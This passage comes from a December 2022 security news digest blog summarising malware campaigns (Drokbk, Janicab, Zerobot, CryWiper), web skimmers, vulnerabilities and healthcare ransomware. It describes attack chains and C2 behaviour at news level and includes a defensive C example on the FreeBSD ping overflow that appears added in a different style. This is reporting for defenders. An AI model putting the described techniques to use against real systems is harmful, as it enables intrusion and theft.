The Medibank breach was much more serious, seeing the release of personal medical information for millions of people. The ABC article examines the role of the general media in increasing the leverage available to extortionists, as well as the impact of reporting on the victims. It's thought-provoking material and useful to bear in mind for any future incident response planning, especially for crisis communications.
Terzon, Emilia, The editorial questions ABC News journalists faced when covering the Medibank data leak, ABC News, 11 December 2022. Available online at https://www.abc.net.au/news/backstory/2022-12-11/editorial-questions-reporting-on-medibank-hack/101737920.
Iranian Web Shell Campaign Uses GitHub as Dead Drop Resolver
Secureworks Counter Threat Unit researchers have reported on a malware campaign being run by a subgroup of the Iranian government sponsored threat group, COBALT MIRAGE. The initial intrusion is performed using any of several techniques; the specific intrusion analyzed by Secureworks started with compromise of a VMware Horizon server using two Log4j vulnerabilities.
Once initial access was obtained, the threat actor uploaded the Drokbk malware as a zip file which was extracted and then executed. The first stage of the malware is a dropper, which is created as a file, SessionService.exe, from an internal resource and then added to the SessionManagerService in order to persist. SessionService.exe is then executed; it begins by finding its C2 domain, which it does using the 'dead drop resolver' technique - this allows an actor to completely change its C2 infrastructure, with operating malware able to rediscover the C2 infrastructure via a public service, such as AWS S3 buckets, Pastebin or even comments on Britney Spears's Instagram account (yes, really). In this case, Drokbk uses the README.md file of a GitHub account to relay the C2 server name.
The analyzed sample initially sent a request, containing the hostname and time, to the C2 server, but no commands were received in response. Drokbk is only one of the tools being used by this threat actor; they are also known to use the Fast Reverse Proxy (FRPC) tool.
Secureworks Counter Threat Unit Team, Drokbk Malware Uses GitHub as Dead Drop Resolver, blog post, 9 December 2022. Available online at https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver.
Janicab Reemerges, Targeting Middle East and Europe
The Janicab backdoor, first seen in 2013, has reemerged in a campaign by a threat actor tagged Deathstalker, which appears to be targeting financial and legal institutions as well as travel agents in the Middle East and Europe, according to Kaspersky researchers. Janicab is cross-platform malware, able to run on both macOS and Windows; the Windows version uses a VBScript-based implant as the final stage and, rather than relying on downloaded exploitation tools, has much of the required functionality implemented internally.
Initial compromise is achieved via spear-phishing, using targeted lures in the form of a ZIP file containing a LNK-based dropper as well as a decoy document. Opening the LNK file executes a chain of malware files - an initial loader, a second stage which extracts a CAB archive containing additional resources and Python code, and finally, the last stage which is the Janicab backdoor. This then deploys a new LNK file into the Startup folder in order to persist.
Like Drokbk, described above, Janicab uses the 'dead drop resolver' technique to locate its C2 server - DeathStalker uses YouTube and WordPress web services for this purpose. Once communication is established, Janicab can perform a variety of functions such as keystroke logging, screen capture, running commands, checking for installed malware, etc. - the use of VBScript allows new modules to be added easily, and the number of variants seen to date suggests that it is under active development.
Global Research and Analysis Team, DeathStalker targets legal entities with new Janicab variant, APT report, 8 December 2022. Available online at https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
News Stories
Poorly-maintained E-commerce Sites Infected with Skimmers
Skimmers have increasingly infected online stores, stealing customer credit card details from their web browsers as they enter them for payment processing. In many cases, they are loaded as part of the payment-processing page, typically as third-party libraries that have somehow been included in error by developers, and the problem is exacerbated by the fact that security staff know what is going on on their own systems, but not what third-party code is doing in customers' browsers.
Now researchers at Jscrambler report on three new threat groups using a new technique to run these attacks. In the first case, the threat actor acquired the expired domain name of a third-party marketing and analytics service called Cockpit, replacing its library with their own malicious code. Using this technique, the attackers were able to compromise over 40 e-commerce sites, exfiltrating credit card details to a C2 server based in Russia. The Cockpit service was shut down in 2014, but the sites had not removed the deprecated libraries - a very basic error.
In the other campaigns, the skimmer code is injected directly, as a fake Google Analytics integration, although the code is similar. In all cases, the site that hosts the JavaScript checks the HTTP Referer header value and based on this will either return no script at all (to make analysis more difficult), a default skimmer script, or a site-specific skimmer. It also typically only runs on two specific pages - the order page and the register page. All the campaigns make use of obfuscation techniques and encryption of exfiltrated data to hinder detection and analysis.
Fortuna, Pedro, Pedro Marrucho and David Alves, Defcon Skimming: A new batch of Web Skimming attacks, blog post, 5 November 2022. Available online at https://blog.jscrambler.com/defcon-skimming-a-new-batch-of-web-skimming-attacks/.
Four Sydney Men Arrested for Part in $US100 million Online Scam
Four Chinese nationals living in Sydney have been arrested by the Australian Federal Police for their part in an online investments scam that has resulted in over $US100 million in losses world-wide. The arrests follow intelligence supplied by the US Secret Service which led the AFP to set up Operation Wickham to investigate the scam, in cooperation with the NSW Police Force.
The scam started with a range of social engineering techniques to gain the trust of potential victims via dating sites, employment sites and messaging platforms before mentioning investment opportunities. Once on the hook, victims were directed to a mixture of legitimate and fraudulent applications that deal in foreign exchange and cryptocurrency trading, but which have been manipulated to show a faked positive return on investments. Victims were also directed to a financial investment service which shows manipulated data through a legitimate application in order to encourage further investment while concealing the fact that their money has actually been stolen.
The four men who were arrested will appear in court in January, when police will allege they were used to register Australian companies in order to enhance the legitimacy of the fraud, as well as to launder the proceeds of the crime through Australian bank accounts (with $A22.5 million being restrained by the AFP in 24 bank accounts). Two of the men, aged 19, will be charged with recklessly dealing with proceeds of crime, while two others, aged 24 and 27, who were arrested in late November while trying to leave the country, are alleged to be the Australian 'controllers' of the syndicate.
AFP Media, Four men charged in Sydney for sophisticated cyber scam - world-wide losses expected to top US$100 million, media release, 9 December 2022. Available online at https://www.afp.gov.au/news-media/media-releases/four-men-charged-sydney-sophisticated-cyber-scam-world-wide-losses.
Google Opens Kimono on Android Privacy
Many Android features run continuously, accessing potentially sensitive information. For example, the Now Playing feature of Pixel phones continuously listens, through the microphone, in order to identify the music you can hear. Now, ask yourself how often you hear people say, "We were just talking yesterday about x, and today I'm getting lots of Facebook ads for x - I swear these machines are listening to us!", and you can begin to understand why many people have concerns about their personal privacy.
As phone brands compete on the level of proactive personalization they provide, services like traffic monitoring for efficient navigation are only viable as long as consumers are willing to use them. To aid in this, Google has released details of, and open-sourced, a key component of the Android privacy architecture, called Private Compute Core. This is a secure and isolated component of the Android OS that allows users to control how, when and where data is processed, both on-phone and by cloud services - for example, the latest phones are sufficiently powerful to perform some translation tasks on the phone itself, without interacting with the cloud.
In particular, Private Compute Core supports federated learning and analytics, which allows training of machine learning models while keeping private data on the phone. In essence, this downloads a training model to a sample set of users' phones; the models train on the data and then return the training results - not the data - back to the cloud. Model testing is performed in a similar, distributed, fashion, and differential privacy is also applied.
Google has now released a white paper describing the Private Compute Core, which controls data privacy for this process, and has also open-sourced the code as a GitHub project.
Kleidermacher, Dave, Dianne Hackborn and Eugenio Marchiori, Trust in transparency: Private Compute Core, blog post, 8 December 2022. Available online at https://security.googleblog.com/2022/12/trust-in-transparency-private-compute.html.
Cisco Warns of VoIP Phone Vulnerability
Cisco has issued a security advisory for its IP Phone 7800 and 8800 series firmware. A vulnerability in the Cisco Discovery Protocol (CDP) code can allow an unauthenticated attacker on the LAN to perform a stack smashing attack, allowing at least a denial of service, if not remote code execution.
There are no workarounds, other than disabling CDP and relying on Link Layer Discovery Protocol (LLDP) to allow the phone to discover its VLAN, negotiate PoE, etc. - but this is a non-trivial and labour-intensive process. Enterprises which have been diligent in separating VoIP traffic from other data - ideally on a physically-separate network, if not a VLAN - will be much harder to exploit than those which have not, but ultimately the only fix is to obtain and deploy updated firmware which will be released in January.
Cisco, Cisco IP Phone 7800 and 8800 Series Cisco Discovery Protocol Stack Overflow Vulnerability, security advisory, 8 December 2022. Available online at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ipp-oobwrite-8cMF5r7U.
News Stories
Government of Vanuatu Networks Shut Down
We start with a story which seems to have slipped under the radar for the last month. Following an election in the tiny Pacific islands nation of Vanuatu, when the new government took office on 6 November, they discovered that government email accounts would not work - and neither would any other computerized government services, such as driver's licence renewals, tax payments or medical information.
Being a tiny nation spread across many islands, there are few opportunities for redundancy in Vanuatu's computer networks, and so government systems are highly centralized in the capital, Port Vila. Government officials first discovered suspicious activity on their networks on 6 December, but only revealed the breach to local media several days later, with international media slow to pick up on the attack. Meanwhile, government services reverted to using pen and paper - which will severely slow service delivery across the dozens of islands that make up the country.
The Australian Cyber Security Centre has provided assistance, and several weeks on, approximately 70% of government services had been restored. These include financial services, health procurement, immigration and passport data and, most importantly, phone connections for emergency services. 
As a small dot on the globe, albeit often voted the happiest nation in the world - and if you have visited, you'll know exactly what I mean - Vanuatu may have escaped attention from cybercriminals. But now the cyber world has caught up with it, and it may possibly have finally been subjected to a ransomware attack, although there is no confirmation of this.
McLaughlin, Jenna, The Pacific island nation of Vanuatu has been knocked offline for more than a month, NPR, 6 December 2022. Available online at https://www.npr.org/2022/12/06/1140752192/the-pacific-island-nation-of-vanuatu-has-been-knocked-offline-for-more-than-a-mo.
Internet Explorer Vulnerabilities Still Causing Damage
The tightly-coupled innards of Windows continue to cause trouble for Microsoft and its customers. Internet Explorer may be officially dead, replaced by Edge, but the Microsoft software ecosystem still relies on IE components for some functionality. An example is Microsoft Word, which renders HTML content in rich text documents using IE.
Now Google's Threat Analysis Group reports the discovery in October of a 0day exploit in the wild, targeting users in South Korea. The lure was an Office document entitled "221031 Seoul Yongsan Itaewon accident response situation (06:00).docx" - a reference to the tragic crowd crush incident during Seoul Halloween celebrations.
Once opened, the document downloads a remote RTF template containing HTML, which causes Office to call the IE rendering engine DLL. This technique is well known, but in this case, it exploits a 0day vulnerability (CVE-2022-41128) in the IE JScript engine. The exploit JavaScript first contacts a C2 server, then launches the exploit shellcode, which covers its tracks by erasing the IE cache and history before downloading the next stage. Google's analysts did not have access to that code, but the same attackers have previously used a variety of implants such as ROKRAT, BLUELIGHT and DOLPHIN.
The infection could easily be blocked by an alert user, since the downloaded document carries the Mark of the Web and requires the user to disable protected view and allow editing. The attack is attributed to the North Korean group, APT37, also known as ScarCruft, Reaper and InkySquid.
LeCigne, Clement and Benoit Sevens, Internet Explorer 0-day exploited by North Korean actor APT37, blog post, 7 December 2022. Available online at https://blog.google/threat-analysis-group/internet-explorer-0-day-exploited-by-north-korean-actor-apt37/.
Darknet Service Trojanizes Legitimate Android Apps
A banking trojan campaign uncovered by fraud intelligence firm ThreatFabric has led investigators to a third-party dark web service which can bind malicious payloads to legitimate Android applications, thereby tricking victims into installing them.
The initial campaign employed several types of desktop malware such as the Erbium stealer, Aurora stealer and Laplas clipper, as well as the Ermac Android banking trojan. The latter was distributed by a one-page website offering applications for wi-fi authorization; several updates were downloaded, with payloads targeting different banking applications. The same site also offered downloads for Windows, which also carried banking trojans.
The researchers tracked these back to a binding service, initially offered by a threat actor in March 2022, called Zombinder, which is now used by several different actors. This is being used to distribute a variety of mobile malware, mainly banking trojans such as Ermac and Xenomorph.
Uncredited, Zombinder: new obfuscation service used by Ermac, now distributed next to desktop stealers, blog post, 8 December 2022. Available online at https://www.threatfabric.com/blogs/zombinder-ermac-and-desktop-stealers.html.
Medibank Goes Offline To Remediate Its Networks
Australian insurer Medibank will take its systems offline - and close its retail storefronts - this weekend while it performs remediation work on the networks and systems which were affected by its recent highly-publicized data breach. All systems for both Medibank and its ahm general insurance subsidiary will be offline from 8:30 pm AEDT tonight (9 December) and are expected to be back online by Sunday 11 December at the latest.
The Medibank app, as well as online terminals for directly processing claims at service provider practices, will also be offline. The lesson: never underestimate remediation costs following a breach.
Uncredited, Planned outage to Medibank systems, notification, 7 December 2022. Available online at https://www.medibank.com.au/health-insurance/info/cyber-security/.
News Stories
New Botnet Targets Multiple Architectures
FortiGuard Labs researchers have observed, and now analysed, a new botnet which is written in the Go programming language and is targeting IoT devices running on a variety of processor architectures - i386, amd64, arm, arm64, mips, mips64, mipsle, ppc64, ppc64le, riscv64 and s390x (although it is hard to imagine many IoT devices running the S/390 mainframe instruction set).
The botnet, called Zerobot, initially had only basic capabilities but in late November it added more functionality. Disassembly of the code revealed that after initial infection it tests Internet connectivity and then copies itself onto the target device, in an OS-dependent location, and then sets up a signal handler to intercept attempts to kill it. From there, it connects to its C2 server using the WebSocket protocol and sends some platform enumeration data, after which it waits for a command.
| Command | Detail | 
|---|---|
| ping | Heartbeat, maintaining the C2 connection | 
| attack | Launch an attack, using different protocols: TCP, UDP, TLS, HTTP, ICMP | 
| stop | Stop attack | 
| update | Install update and restart Zerobot | 
| enable_scan | Scan for open ports and start spreading itself via exploit or SSH/Telnet cracker | 
| disable_scan | Disable scanning | 
| command | Run an OS command, using cmd.exe on Windows and bash on Linux | 
| kill | Kill the botnet program | 
Zerobot can employ any of 21 different exploits which target a range of IoT devices but also includes Spring4Shell, and exploits for phpAdmin and F5 Big-IP. It is rapidly evolving; within a very short time it was updated with string obfuscation, a copy file module and a propagation exploit module which gives it the ability to infect more devices. The FortiGuard Research post includes IOCs, but its rapid evolution means that proactive patching against its exploits will be the best defence.
Lin, Cara, Zerobot - New Go-Based Botnet Campaign Targets Multiple Vulnerabilities, blog post, 6 December 2022. Available online at https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities.
Sophisticated Attack on Amnesty International Canada
Amnesty International Canada (English-speaking Section) has revealed that it was the target of a sophisticated cyberattack which forensic experts from Secureworks believe was sponsored by the Chinese state. This conclusion is based on "the nature of the targeted information as well as the observed tools and behaviors, which are consistent with those associated with Chinese cyberespionage threat groups".
The breach was first detected on 5 October 2022, when suspicious behaviour was observed on Amnesty's IT infrastructure. Immediate action was taken, with Secureworks being retained to protect the organization's systems and investigate the attack. The investigation has uncovered no evidence that any donor or membership data was exfiltrated.
Amnesty is speaking publicly to warn other human rights organizations about the rising threat of cyber breaches, and to strongly condemn state and non-state actors who are intent on interfering with the work of human rights and other civil society organizations.
Ruf, Cory, Amnesty International Canada target of sophisticated cyber-attack linked to China, news release, 5 December 2022. Available online at https://www.amnesty.ca/news/news-releases/cyber-breach-statement/.
Likely Chinese APT Targets Middle East Telco
Researchers at Bitdefender have found a new cyber-espionage campaign which targeted a telecommunications firm in the Middle East. Investigation of sample binaries suggests the campaign can be attributed to a Chinese threat actor called BackdoorDiplomacy.
The initial infection mechanism was an August 2021 ProxyShell exploitation of a vulnerable Exchange server. From there, the group deployed the NPS proxy tool and the IRAFAU backdoor into the organization. In February 2022, the attackers deployed the Quarian backdoor along with several other scanners and proxy/tunneling tools, with the use of keyloggers and exfiltration tools suggesting the campaign objective is cyber-espionage.
BackdoorDiplomacy has been operating since at least 2017, targeting institutions in the Middle East, Africa and the US. The researchers have produced a comprehensive 33-page whitepaper which details the techniques used for initial access, execution, reconnaissance, lateral movement, persistence, privilege escalation, defence evasion, collection and infiltration, as well as cataloguing the various tools used.
Schipor, Adrian and Victor Vrabie, BackdoorDiplomacy Wields New Tools in Fresh Middle East Campaign, blog post, 7 December 2022. Available online at https://www.bitdefender.com/blog/labs/backdoor-diplomacy-wields-new-tools-in-fresh-middle-east-campaign.
News Stories
Russian Mayors' Offices, Courts, Hit by Wiper
Who can forget 2017's NotPetya attack - a wiper which spread around the world and across industries, yet likely started as an attack on the Ukrainian Government's tax revenues, by Russian threat actors? Now Russia is on the receiving end of a wiper attack, although it seems unlikely to have quite the same impact.
According to Kaspersky researchers, CryWiper is written in C++ and, unusually, compiled using the MinGW-w64 toolkit and gcc compiler, rather than the more common Microsoft tools - suggesting that the author was using a non-Microsoft OS for development. After creating a scheduled task in order to remain active, the malware contacts its C2 server, passing the name of the infected computer and, in response, the C2 server replies 'run' or 'do not run'. If instructed not to run, the malware delays execution with the intention of checking again in 4 days.
But if run, CryWiper stops any running MySQL or SQL Server databases, deletes shadow copies of files and blocks RDP connections, presumably to slow incident responders. It then sets about overwriting user files with random data, which it generates using the Mersenne Twister pseudo-random number generator (a characteristic it shares with the IsaacWiper malware). It also leaves a ransom demand in a README.txt file - but of course, there is no point in paying the ransom.
CryWiper has been attacking systems in the Russian Federation, particularly courts and mayors' offices.
Sinitsyn, Fedor and Janis Zinchenko, Новый троянец CryWiper прикидывается шифровальщиком (New CryWiper trojan pretends to be ransomware), Kaspersky SecureList blog, 1 December 2022. Available online at https://securelist.ru/novyj-troyanec-crywiper/106114/. Google translation at https://securelist-ru.translate.goog/novyj-troyanec-crywiper/106114/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp.
Ransomware is Accidental Wiper
In related news, Fortinet Labs reports on a ransomware toolkit called Cryptonite which has been used to produce customised ransomware for targeted campaigns. The toolkit provides a simple sample which lets the operator set an exclusion list server URL, email address and bitcoin wallet, but which lacks the more advanced features common in today's ransomware, such as shadow copy file deletion, file unlocking (e.g. stopping databases, as in the CryWiper example above), and antiforensics and evasion techniques.
However, Fortinet stumbled across a sample in the wild which went through all the steps of encryption, even displaying a progress bar as it pretended to be a software update. However, it never displayed the final window which would allow the victim to enter a decryption key. Suspecting the threat actor behind this sample had deliberately turned it into a wiper, the researchers set about decompiling the sample into its original Python code.
After being led astray by an interesting failure in the decompilation process, they turned to dynamic analysis, eventually running the sample in a cmd.exe window, which produced an error message that revealed all: the ransomware failed to load the tkinter library, which would be used to produce the pop-up window for the decryption key (tkinter is commonly used to implement GUIs for a number of scripting languages). This leaves no way for the victim to recover, as the decryption key is lost from memory when the program crashes, and is never sent to the operator.
The saving grace is that Cryptonite is very basic and should be easily detected by anti-malware programs. Also, the toolkit has now been removed from GitHub.
Revay, Gergely, The Story of a Ransomware Turning into an Accidental Wiper, blog post, 5 November 2022. Available online at https://www.fortinet.com/blog/threat-research/The-story-of-a-ransomware-turning-into-an-accidental-wiper.
Servers at Risk of RCE Exploits Via Baseboard Management Controllers
Last week we wrote of vulnerabilities in baseboard management controller chips which had been repurposed into devices on the Internet of Things. It was, perhaps, inevitable that the same vulnerabilities would show up in the rackmount servers which are the intended use case for BMC chips - and they have, according to a report from Eclypsium.
The vulnerabilities are actually in the AMI MegaRAC software which runs on the BMC circuitry of servers from many manufacturers including DELL EMC, HP Enterprise, and Lenovo as well as motherboard manufacturers such as ASRock, ASUS and Gigabyte. Eclypsium refers to the three vulnerabilities as BMC&C:
- CVE-2022-40259 – Arbitrary Code Execution via Redfish API (CVSS v3.1 score: 9.9, Critical)
- CVE-2022-40242 – Default credentials for UID = 0 shell via SSH (CVSS v3.1 score 8.3, High)
- CVE-2022-2827 – User enumeration via API (CVSS v3.1 score 7.5, High)
Redfish is the successor to the older IPMI, and provides an API for server management in data centers. It is supported by almost all major vendors as well as the OpenBMC firmware project. The first two CVEs both lead directly to a root shell, with no further escalation necessary.
Suggested mitigations include ensuring that remote management interfaces are on dedicated management networks and not exposed externally, and disabling built-in administrative accounts.
Babkin, Vlad, Supply Chain Vulnerabilities Put Server Ecosystem at Risk, blog post, 5 December 2022. Available online at https://eclypsium.com/2022/12/05/supply-chain-vulnerabilities-put-server-ecosystem-at-risk/.
News Stories
Remember Ping of Death? You Are Not Alone
Many years ago, systems which used code from the BSD TCP/IP stack - which was most OSes of the era, including Windows - were plagued by a buffer overflow in the IP fragment reassembly code which would instantly crash the targeted system. This exploit was nicknamed the 'Ping of Death'. Now FreeBSD users are having a sense of deja vu, as they come to grips with a buffer overflow in the ping utility.
In order to process the ICMP echo reply (or other error) responses it receives, ping has to reconstruct the received IP header, its ICMP payload and - if there is one - the IP and ICMP headers of the error-generating datagram, which is the payload of ICMP itself. To do this, it calls a pr_pack() function which - and here's the vulnerability - fails to allow for any IP header options in either of the two IP headers. If there are options, the result is that the destination buffer is overflowed by up to 40 bytes - and those bytes could be carrying shellcode. Can you spell RCE? I knew you could!
But it gets better: because ping uses ICMP, it has to make use of a raw socket to work, and this requires root privileges - so it runs as a SetUID executable; in other words, as root. The saving grace is that the ping process runs in a capability mode sandbox on the affected versions of FreeBSD, and is thus very constrained in how it can interact with the rest of the system. But it's surprising what an ingenious attacker can achieve from such a tenuous toehold on a targeted system.
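To make the bug class concrete, here is an added illustration in C; it is not the FreeBSD pr_pack() code, and the function names (ipv4_hdr_len, copy_headers_checked, option_bytes, build_echo_reply and the demo_* helpers) are hypothetical. It shows the defensive pattern the advisory implies: take each IP header's length from its IHL field, so that up to 40 bytes of options per header are counted before anything is copied into a fixed stack buffer, and refuse the copy when it would not fit. The ICMP packet it parses is constructed inline, not a real capture.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IP_HDR_MIN 20      /* IHL = 5 words: no options */
#define IP_HDR_MAX 60      /* IHL = 15 words: 40 bytes of options */
#define ICMP_HDR    8      /* type, code, checksum, rest-of-header */

/* IPv4 header length from the IHL nibble, not assumed to be 20.
 * Returns 0 if the header is truncated or malformed. */
size_t ipv4_hdr_len(const uint8_t *p, size_t len)
{
    if (len < IP_HDR_MIN || (p[0] >> 4) != 4)
        return 0;
    size_t hl = (size_t)(p[0] & 0x0f) * 4;
    return (hl < IP_HDR_MIN || hl > len) ? 0 : hl;
}

/* ICMP error types (unreachable, source quench, redirect, time exceeded,
 * parameter problem) quote the offending datagram's IP header, with its
 * own possible options, after the 8-byte ICMP header. */
static bool icmp_quotes_datagram(uint8_t type)
{
    return type == 3 || type == 4 || type == 5 || type == 11 || type == 12;
}

/* Bounds-checked copy of the headers a ping-style parser needs: outer IP
 * header + ICMP header and, for error messages, the quoted IP header + 8
 * bytes of its payload. Each length comes from IHL, so options are
 * counted instead of overrunning dst. Returns bytes written, or 0 when
 * the packet is malformed or would not fit in dstcap. */
size_t copy_headers_checked(const uint8_t *pkt, size_t len,
                            uint8_t *dst, size_t dstcap)
{
    size_t ohl = ipv4_hdr_len(pkt, len);
    if (ohl == 0 || len < ohl + ICMP_HDR)
        return 0;
    size_t need = ohl + ICMP_HDR;
    if (icmp_quotes_datagram(pkt[ohl])) {
        size_t ihl = ipv4_hdr_len(pkt + need, len - need);
        if (ihl == 0 || len - need < ihl + ICMP_HDR)
            return 0;
        need += ihl + ICMP_HDR;
    }
    if (need > dstcap)
        return 0;                 /* refuse rather than write past dst */
    memcpy(dst, pkt, need);
    return need;
}

/* Option bytes beyond the 20-byte-header assumption, over both headers:
 * a buffer sized for option-less headers is short by exactly this much. */
size_t option_bytes(const uint8_t *pkt, size_t len)
{
    size_t ohl = ipv4_hdr_len(pkt, len);
    if (ohl == 0 || len < ohl + ICMP_HDR)
        return 0;
    size_t extra = ohl - IP_HDR_MIN, off = ohl + ICMP_HDR;
    if (icmp_quotes_datagram(pkt[ohl])) {
        size_t ihl = ipv4_hdr_len(pkt + off, len - off);
        if (ihl > 0)
            extra += ihl - IP_HDR_MIN;
    }
    return extra;
}

/* Constructed sample, not a real capture: an ICMP echo reply (type 0)
 * whose IP header is ihl_words*4 bytes, padded with NOP options (type 1).
 * Returns the packet length, or 0 if buf is too small or IHL is invalid. */
size_t build_echo_reply(uint8_t *buf, size_t cap, unsigned ihl_words)
{
    size_t hl = (size_t)ihl_words * 4;
    if (ihl_words < 5 || ihl_words > 15 || cap < hl + ICMP_HDR)
        return 0;
    memset(buf, 0, hl + ICMP_HDR);
    buf[0] = (uint8_t)(0x40 | ihl_words);           /* version 4, IHL */
    buf[9] = 1;                                     /* protocol = ICMP */
    memset(buf + IP_HDR_MIN, 1, hl - IP_HDR_MIN);   /* NOP options */
    return hl + ICMP_HDR;                           /* buf[hl] = 0: echo reply */
}

/* Exercise the sample against a no-options buffer (20 + 8 bytes). */
size_t demo_option_bytes(unsigned ihl_words)
{
    uint8_t pkt[IP_HDR_MAX + ICMP_HDR];
    size_t n = build_echo_reply(pkt, sizeof pkt, ihl_words);
    return option_bytes(pkt, n);
}

size_t demo_copy_into_fixed(unsigned ihl_words)
{
    uint8_t pkt[IP_HDR_MAX + ICMP_HDR], fixed[IP_HDR_MIN + ICMP_HDR];
    size_t n = build_echo_reply(pkt, sizeof pkt, ihl_words);
    return copy_headers_checked(pkt, n, fixed, sizeof fixed);
}
```

With IHL = 15 the reply carries 40 option bytes, which is precisely the amount a 28-byte buffer sized for option-less headers would be overrun by; copy_headers_checked() returns 0 and writes nothing, whereas an option-less reply (IHL = 5) copies its 28 bytes normally. A parser sized for the worst case (two 60-byte IP headers plus two 8-byte ICMP headers, 136 bytes) accepts both.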
There is no workaround, and all supported versions of FreeBSD are affected. The fix is to upgrade to a supported version dated after 2022-11-29 23:00 UTC, approximately - see the security advisory for full details.
Uncredited, Stack overflow in ping(8), security advisory, 29 November 2022. Available online at https://www.freebsd.org/security/advisories/FreeBSD-SA-22:15.ping.asc.
Chinese Hackers Stole Tens of Millions of Dollars of US COVID Relief Funding
According to the US Secret Service, hackers associated with the Chinese government stole at least $US20 million in US COVID relief benefits, including Small Business Administration loans and unemployment insurance funds. The theft was performed by APT41, aka Winnti, a threat actor that splits its efforts between financially motivated cybercrime on its own behalf and cyber-espionage for the Chinese government.
Several members of APT41 were indicted by the Department of Justice for espionage operations, with Deputy Attorney General Jeffrey Rosen commenting at the time, "Regrettably, the Chinese Communist Party has chosen a different path of making China safe for cybercriminals so long as they attack computers outside China and steal intellectual property helpful to China".
Bing, Christopher, Chinese hackers stole millions worth of U.S. COVID relief money, Secret Service says, Reuters, 6 December 2022. Available online at https://www.reuters.com/technology/chinese-hackers-stole-millions-worth-us-covid-relief-money-secret-service-says-2022-12-05/.
Healthcare Ransomware Attacks Escalating
Ransomware attacks on hospitals, health insurers and other parts of the healthcare sector are steadily increasing and it seems likely that this will become one of the major security trends of 2023.
Last week, it was the turn of New Zealand health insurance company Accuro, which announced that it had lost access to its systems - which seems to be code for ransomware - and while it had no evidence of personal health information being exfiltrated, it could not rule it out. The previous month, patient data stolen from NZ GP network Pinnacle Health was posted on the web. And, of course, I need not mention Medibank.
Most recently, a hospital complex in Versailles, in the suburbs of Paris, had to cancel operations and transfer some patients because of a cyberattack, according to the French health ministry. The Hospital Centre of Versailles, which consists of Andre-Mignot Hospital, Richaud Hospital and the Despagne Retirement Home, had to shut down its computer systems, internet access and phone systems due to what appears to be a ransomware attack.
Extra staff had to be called in to the intensive care unit because although the equipment there was still working, it was not connected to the network, and doctors had to rely on people watching the screens. Six patients in total had to be transferred - three from intensive care and three from the neonatal unit, said the Minister, Francois Braun, during a visit to the hospital.
Many other French hospitals have been attacked - the same hospital had successfully defended itself against previous attacks, but back in August the Corbeil-Essonnes hospital, also on the outskirts of Paris, was disrupted for several weeks due to a ransomware attack. Although a $US10 million ransom was demanded in that case, it would not be paid, since the French government has legislated to make ransom payments illegal.
AFP, French hospital suspends operations after cyber attacks, France 24, 5 December 2022. Available online at https://www.france24.com/en/france/20221205-french-hospital-suspends-operations-after-cyber-attacks.
Palo Alto Introduces Medical IoT Security
In the cases above, the key equipment was not affected - only the networks and computers. But network-connected medical equipment such as infusion pumps, imaging devices (X-ray, MRI and CT scanners) and even more basic ECG monitors are increasingly based on embedded microcontrollers or computers - in many cases, even running COTS operating systems.
In fact, according to Palo Alto Networks' Unit 42 Threat Research, 75% of infusion pumps they studied had at least one vulnerability or threw up a security alert, while 51% of X-ray machines had a high-severity vulnerability (CVE-2019-11687). 44% of CT scanners and 31% of MRI machines had high-severity exposures and - not really a surprise - 20% of common imaging devices were running an unsupported version of Windows.
Seeing an obvious market opportunity - not to mention a need - Palo Alto has introduced a new Medical IoT Security product which will assess all devices and guide network segmentation to enforce the principle of least privilege, using machine learning. There's lots of other functionality, including ensuring data residency requirements in various countries are met, regulatory compliance, device vulnerability management and automated response to anomalies.
It will be interesting to see how this pans out. According to medical professionals I have spoken to, they often need privileges in excess of their normal roles in order to respond to patient emergencies, and so attempts to tightly lock down medical information systems can be terribly counter-productive. But, as the previous story shows, the opposite approach doesn't work either. Finding the 'sweet spot' is going to be a difficult process.
Xu Zou, The Medical IoT Security To Depend on When Lives Depend on You, blog post, 5 December 2022. Available online at https://www.paloaltonetworks.com/blog/2022/12/medical-iot-security-to-depend-on/.
Koppel, R., Smith, S., Blythe, J., & Kothari, V., Workarounds to Computer Access in Healthcare Organizations: You Want My Password or a Dead Patient?, in Driving Quality in Informatics: Fulfilling the Promise, 2015, vol. 208, pp. 215–220.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.